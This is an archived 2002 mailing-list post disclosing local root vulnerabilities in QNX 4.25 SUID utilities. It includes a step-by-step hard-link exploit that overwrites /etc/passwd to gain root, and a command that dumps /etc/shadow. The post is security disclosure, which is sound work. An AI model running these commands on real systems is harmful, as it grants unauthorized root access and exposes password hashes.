OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Simon Ouellette (einherjhotmail.com)
Date: Fri May 31 2002 - 16:42:17 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I think I found what appears to be several (or one fundamental)
    vulnerabilities under QNX(tested on version 4.25). I have not found any
    documentation/reference to these anywhere, so I assume they/it were not
    known.

    Importance of the bug: any local user can gain root access(which, under QNX,
    means root access to the entire network, of course)

    Nature: some(or "most" ? or "all" ?) SUID programs that output data to files
    actually do not look for permissions before overwriting identical(already
    existent) filenames. Also, they follow hard links(I did not verify how they
    react to symbolic links). In fact, not only do they overwrite the files, but
    they give the user ownership of the file. So programs like /bin/dumper,
    monitor, the Watcom "sample" utility, can be used to overwrite and gain
    ownership of read-only, root-owned files such as /etc/passwd. From there,
    it's easy to figure out how to gain root access...

    Example exploit, with /bin/dumper:

    Let EVIL be the unprivileged user who wants to gain root access.

    #link to the passwd file: dumper dumps to [process name].dmp
    $ ln /etc/passwd /home/EVIL/ksh.dmp
    #call the program that will attempt to write to the hard link
    $ dumper -d /home/EVIL -p [PID of EVIL's ksh]
    #have dumper do its job by terminating the monitored process
    $ exit
    #at this point, /etc/passwd is overwritten by the binary dump, and more
    importantly: EVIL is now the owner !
    $ echo root::0:0::///:/bin/sh > /etc/passwd
    #but now no login works because /etc/passwd is not owned by userid 0. #So
    you do:

    $ passwd

    #and change your password. This gives /etc/passwd ownership back to root,
    keeping the modifications you have made.

    $ su
    #

    "monitor" is even easier to exploit, for example, because you can directly
    specify the filename with the parameter -f /etc/passwd. No need for a link.

    Another similar vulnerability was with crttrap. This utility has one
    interesting parameter/option that allows you to dump the contents of the
    configuration file.... and it is SUID. So all you have to do is:
    $ crttrap -c /etc/shadow

    ...and it will dump the shadow file for you(even if you normally do not have
    read access to it, such as with an unprivileged user).

    So this can either be seen as multiple vulnerabilities in different
    programs, or as a single fundamental flaw in the ownership/permissions
    checking of the filesystem. I could not tell at what level exactly is the
    flaw.

    Could some of you reproduce the exploit and confirm that it works ? I would
    like to make sure that it is not specific to, maybe, some configuration flaw
    in the systems I used to test it. Also, if you could check with the most
    recent QNX versions to see if this is still applicable...

    P.S.: I also noticed that Watcom sample and int10, but not monitor, will
    segfault when they are given long filenames as a parameter... Maybe this can
    turn into a buffer overflow, but I did not have the time to check.

    Simon Ouellette

    _________________________________________________________________
    Join the world’s largest e-mail service with MSN Hotmail.
    http://www.hotmail.com